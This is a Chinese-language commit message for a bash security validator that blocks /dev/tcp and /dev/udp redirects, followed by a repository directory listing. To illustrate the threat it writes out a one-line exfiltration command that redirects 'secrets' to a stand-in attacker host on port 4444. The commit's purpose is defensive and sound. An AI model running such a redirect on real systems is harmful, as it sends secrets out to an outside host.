Bash 支持 /dev/tcp/host/port 和 /dev/udp/host/port 伪设备路径, 攻击者可通过重定向实现网络数据泄露而无需任何网络工具: echo "secrets" > /dev/tcp/evil.com/4444 新增 validateNetworkDeviceRedirect 安全验证器,在 bashSecurity.ts 的同步和异步验证器列表中均注册。同时补全了反斜杠转义和复合命令 安全场景的测试覆盖(42 个测试用例)。 Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com> |
||
|---|---|---|
| .. | ||
| @ant | ||
| acp-link | ||
| agent-tools | ||
| audio-capture-napi | ||
| builtin-tools | ||
| color-diff-napi | ||
| image-processor-napi | ||
| mcp-client | ||
| modifiers-napi | ||
| remote-control-server | ||
| url-handler-napi | ||
| weixin | ||
| tsconfig.json | ||